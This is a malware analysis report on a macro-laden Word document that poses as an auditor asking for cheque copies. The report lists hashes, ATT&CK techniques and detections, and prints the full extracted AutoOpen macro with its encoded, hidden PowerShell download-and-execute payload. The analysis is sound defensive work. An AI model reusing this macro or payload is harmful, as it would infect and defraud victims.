Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9390d164f86cb3ef…

MALICIOUS

Office (OOXML)

27.5 KB Created: 2014-03-30 23:04:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-17
MD5: 3828d83c2d195c0ecbba1c4f0a600190 SHA-1: 66f4802e75396cb17bcbebf8105baf6ad2285501 SHA-256: 9390d164f86cb3efbadb0305a719de47dc98a12ecb14c3a3955b63e3c165c3d1
352 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that utilize WScript.Shell and PowerShell, indicating an attempt to execute malicious code. The AutoOpen macro is designed to run automatically, and it appears to be constructing a PowerShell command to download and execute a payload. The document body impersonates an auditor requesting cheque copies, a common lure for financial fraud.

Heuristics 9

  • ClamAV: Doc.Virus.Pwshell-6755238-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Virus.Pwshell-6755238-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set a = CreateObject("WScript.Shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set a = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6568 bytes
SHA-256: 90dc6a93cb09f408ce53d98c0a839ff6b02c680d765cc51e0b889169696d0394
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
b = "JwByAGIASQBRAE8AZgBKAFoAYwAnADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwA7ACcAVwBWAGIAVgAnADsAJwBEAFAAdwBBAEUAQQByACcAOwAkAHcAawB2ACAAPQAgACgAZwBlAHQALQB3AG0AaQBvAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQBQAHIAbwBkAHUAYwB0ACkALgBVAFUASQBEADsAJwBRAE8AZwBvAFQAJwA7ACcAbABTAGYAZgBFACcAOwBpAGYAIAAoACgAZwBwACAASABLAEMAVQA6AFwAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgApACAALQBtAGEAdABjAGgAIAAkAHcAawB2ACkAewA7ACcASABHAFIARgBVAHoAbQAnADsAJwBMAFIAZgBHAHUATQBCAGYASwBMACcAOwAoAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABwAGkAZAApAC4ASwBpAGwAbAAoACkAOwAnAHEARQBaACcAOwAnAFoAWQBtACcAOwB9ADsAJwB5AEIAZg" _
& "BqAHcASgBWAHkAJwA7ACcAegBuAEkAWgBFAHYAJwA7ACcAegBxACcAOwAnAEgAcAB1ACcAOwBmAHUAbgBjAHQAaQBvAG4AIABlACgAJABwAGIAZgBmACkAewA7ACcAZAB0AEgAdABTAFgAeQBSAE0AJwA7ACcAcwBYAEUATgBOAEMAdQAnADsAJABqAHYAYwBlACAAPQAgACgAKAAoAGkAZQB4ACAAIgBuAHMAbABvAG8AawB1AHAAIAAtAHEAdQBlAHIAeQB0AHkAcABlAD0AdAB4AHQAIAAkAHAAYgBmAGYAIAA4AC4AOAAuADgALgA4ACIAKQAgAC0AbQBhAHQAYwBoACAAJwAiACcAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcAIgAnACwAIAAnACcAKQBbADAAXQAuAFQAcgBpAG0AKAApADsAJwBUAGoAeABDAFYAcQBsAHoAeAAnADsAJwB3AFYAcwBYAHAAZwB1AHoAbAAnADsAJABjAG4AaQBtAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGoAdgBjAGUALAAgACQAagBkAGgAKQA7ACcAdwB3AGEAaABJAG0AdgBhAEQARgAnADsAJwBaAFcAaQBaAEMASwBPAG8ARAAnADsAJABzAGMAIAA9ACAAJABjAGQAbQAuAE4AYQBtAGUAUwBwAGEAYwBlACgAJABqAGQAaAApAC4ASQB0AGUAbQBzACgAKQA7ACcAYQBKAE4ARQB4AEoAawAnADsAJwBH" _
& "AGUAJwA7ACQAYwBkAG0ALgBOAGEAbQBlAFMAcABhAGMAZQAoACQAZgBrAHoAdgApAC4AQwBvAHAAeQBIAGUAcgBlACgAJABzAGMALAAgADIAMAApADsAJwBCAHgAdgBQAFYAbwBkAGYAZgBtAHoAJwA7ACcAZwBsAHIAQwBkAGgAeABlAE4AJwA7AHIAZAAgACQAagBkAGgAOwAnAEcASwBhAGgAUwBnAE4ATQBGAEYARwAnADsAJwBhAGcAVgBUAHAAYQBJACcAOwB9ADsAJwBIAE8AeQBBAHcAdABpAFYAaQAnADsAJwB3AGoARABKAEMAZABKAEYAQQAnADsAJwB5AEQARQBoAE0AUQBFAGcAdABIAHQAJwA7ACcAbQBOAEQASQBUAGYASAAnADsAJwBEAEUAdQBNAEsAdQAnADsAJwB6AHQARQBTAFgAYwBjAHkAJwA7ACQAZgBrAHoAdgAgAD0AIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAgACsAIAAnAFwAJwAgACsAIAAkAHcAawB2ADsAJwBLAEwAdwBWAEkAcgByAEIATwBnACcAOwAnAG0ATQBnAG4AdQB4AFcAWQB2ACcAOwBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBrAHoAdgApACkAewA7ACcAYQBkAHMAVQBFAEsAJwA7ACcAQwBlAFAAJwA7ACQAeABsAHMAaAAgAD0AIABOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG" _
& "0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBGAG8AcgBjAGUAIAAtAFAAYQB0AGgAIAAkAGYAawB6AHYAOwAnAFIAZwBKAHYAaQAnADsAJwB1AEYAYgByAG8AbAAnADsAJAB4AGwAcwBoAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAiAEgAaQBkAGQAZQBuACIALAAgACIAUwB5AHMAdABlAG0AIgAsACAAIgBOAG8AdABDAG8AbgB0AGUAbgB0AEkAbgBkAGUAeABlAGQAIgA7ACcAbwB4AG4AVQBNAE4AeABLAFgAUQAnADsAJwBrAGUAbgBQAEkAYQBtAGYAbwBjAEwAJwA7AH0AOwAnAGwASwBqAE8AbwAnADsAJwBVAEkAJwA7ACcASQBUAG8AWABiACcAOwAnAHYAWQBoAHgATwBkAGMAbwAnADsAJAB3AHYAbAA9ACQAZgBrAHoAdgArACAAJwBcAHQAbwByAC4AZQB4AGUAJwA7ACcAWABvACcAOwAnAHMAdwBEAGYAeABiAEUAUgBqAFQAdwAnADsAJAB0AHoAeQA9ACQAZgBrAHoAdgArACAAJwBcAHAAbwBsAGkAcABvAC4AZQB4AGUAJwA7ACcAZABQAHIAWQBQAFAAYwBOAGYARwAnADsAJwB1AGQAWgBsAHcAJwA7ACQAagBkAGgAPQAkAGYAawB6AHYAKwAnAFwAJwArACQAdwBrAHYAKwAnAC4AegBpAHAAJwA7ACcAYwBRAFoA" _
& "ZwBUAGMAcwBMAEcAQwAnADsAJwBqAHAAYwAnADsAJABjAG4AaQBtAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACcAWgBxAEcAcAAnADsAJwBmAE0AVQBHAEQAUgBaAEsAVAAnADsAJABjAGQAbQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAIABTAGgAZQBsAGwALgBBAHAAcABsAGkAYwBhAHQAaQBvAG4AOwAnAG4AWgBWACcAOwAnAEkAbQBTAGoAJwA7ACcAYgBVAFoASgBzAGkAbABWAGUAVwAnADsAJwBsAGsAbABqAHMASwBzAEkATgBlAGUAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB3AHYAbAApACAALQBvAHIAIAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAHQAegB5ACkAKQB7ADsAJwBCAEIAUQBFAE8AUgAnADsAJwBYAG4ASgB1AEgAJwA7AGUAIAAnAGkALgB2AGEAbgBrAGkAbgAuAGQAZQAnADsAJwBsAFkAdQBxACcAOwAnAEYAaQBtAHIASwAnADsAfQA7ACcARgBXAEIAZAB2AEIAQQBPAGMAJwA7ACcARABjAGIASgAnADsAJwBVAHQAcQAnADsAJwBCAFYAbgBPAHcATgBYAHoATgAnADsAaQBmACAAKAAhACgAVABlAHMAdA" _
& "AtAFAAYQB0AGgAIAAkAHcAdgBsACkAIAAtAG8AcgAgACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAdAB6AHkAKQApAHsAOwAnAFMATgBPAHkAJwA7ACcAQwBpAFkASwBzAHcAeQBKAEIARAAnADsAZQAgACcAZwBnAC4AaQBiAGkAegAuAGMAYwAnADsAJwBKAHkAegAnADsAJwByAEsAbgBaAHAAcwBOAG0ASQAnADsAfQA7ACcAagB0ACcAOwAnAEMAWgBEACcAOwAnAFQAagAnADsAJwBXAGEAZwBnAHQAZABOAEwAWgBHACcAOwAkAHkAbgBmAHUAPQAkAGYAawB6AHYAKwAnAFwAcgBvAGEAbQBpAG4AZwBsAG8AZwAnADsAJwBVAHkAJwA7ACcAZgBTAGwAdQBrAFEASwAnADsAcwBhAHAAcwAgACQAdwB2AGwAIAAtAEEAcgAgACIAIAAtAC0ATABvAGcAIABgACIAbgBvAHQAaQBjAGUAIABmAGkAbABlACAAJAB5AG4AZgB1AGAAIgAiACAALQB3AGkAIABIAGkAZABkAGUAbgA7ACcASABKAEgAJwA7ACcAUQBBAFoARQBCACcAOwBkAG8AewBzAGwAZQBlAHAAIAAxADsAJAByAHEAcQA9AGcAYwAgACQAeQBuAGYAdQB9AHcAaABpAGwAZQAoACEAKAAkAHIAcQBxACAALQBtAGEAdABjAGgAIAAnAEIAbwBvAHQAcwB0AHIAYQBwAHAAZQBkACAAMQAw" _
& "ADAAJQA6ACAARABvAG4AZQAuACcAKQApADsAJwBnAHAAaQBoAE4AUQB4AEYAJwA7ACcAbgBBAGYAWABNAGwAJwA7AHMAYQBwAHMAIAAkAHQAegB5ACAALQBhACAAIgBzAG8AYwBrAHMAUABhAHIAZQBuAHQAUAByAG8AeAB5AD0AbABvAGMAYQBsAGgAbwBzAHQAOgA5ADAANQAwACIAIAAtAHcAaQAgAEgAaQBkAGQAZQBuADsAJwB0AGoAbgAnADsAJwBSAHoAYQBSAGQAWgBiAEYAcQBKAE8AJwA7AHMAbABlAGUAcAAgADcAOwAnAFQATABoAGwAVABuAEYAJwA7ACcAWABOAGcAWABlAGYAVwB4AFUAJwA7ACQAZABzAHgAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQAoACIAbABvAGMAYQBsAGgAbwBzAHQAOgA4ADEAMgAzACIAKQA7ACcATgBwAGcAQwB4AFYAWABaAGoAcgAnADsAJwBNAGIAJwA7ACQAZABzAHgALgB1AHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwAnAEsAQQBLAHUAaABIAEwARQBCAEkAZwAnADsAJwBvAE8AdgAnADsAJABjAG4AaQBtAC4AcAByAG8AeAB5AD0AJABkAHMAeAA7ACcAbQBLACcAOwAnAF" _
& "AAYQBOACcAOwAkAHIAcQBhAD0AJwBoAHQAdABwADoALwAvAHAAbwB3AGUAcgB3AG8AcgBtAGoAcQBqADQAMgBoAHUALgBvAG4AaQBvAG4ALwBnAGUAdAAuAHAAaABwAD8AcwA9AHMAZQB0AHUAcAAmAHUAaQBkAD0AJwAgACsAIAAkAHcAawB2ADsAJwB6AEcAYQB4AHgASwBoACcAOwAnAEsARwBiAEYASgByACcAOwB3AGgAaQBsAGUAKAAhACQAawBsAHAAcwApAHsAJABrAGwAcABzAD0AJABjAG4AaQBtAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJAByAHEAYQApAH0AOwAnAG0AegByACcAOwAnAFkAbABWAFkAWABJACcAOwBpAGYAIAAoACQAawBsAHAAcwAgAC0AbgBlACAAJwBuAG8AbgBlACcAKQB7ADsAJwBkAFkAWABzAHIAWABiAHEAagB3ACcAOwAnAEQAUwBSAEIARwBoACcAOwBpAGUAeAAgACQAawBsAHAAcwA7ACcAdwBDAEIATQAnADsAJwB2AFQAcQBtAFoAUgBwAFEAQQBiACcAOwB9ADsAJwBWAGUASwBmAGsAagBXACcAOwA="
Set a = CreateObject("WScript.Shell")
a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 17920 bytes
SHA-256: a70f17adfdcf58347b587ae4d47723ebf770effd70657aa6442d27cfef0c37c3
Detection
ClamAV: Doc.Virus.Pwshell-6755238-0
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).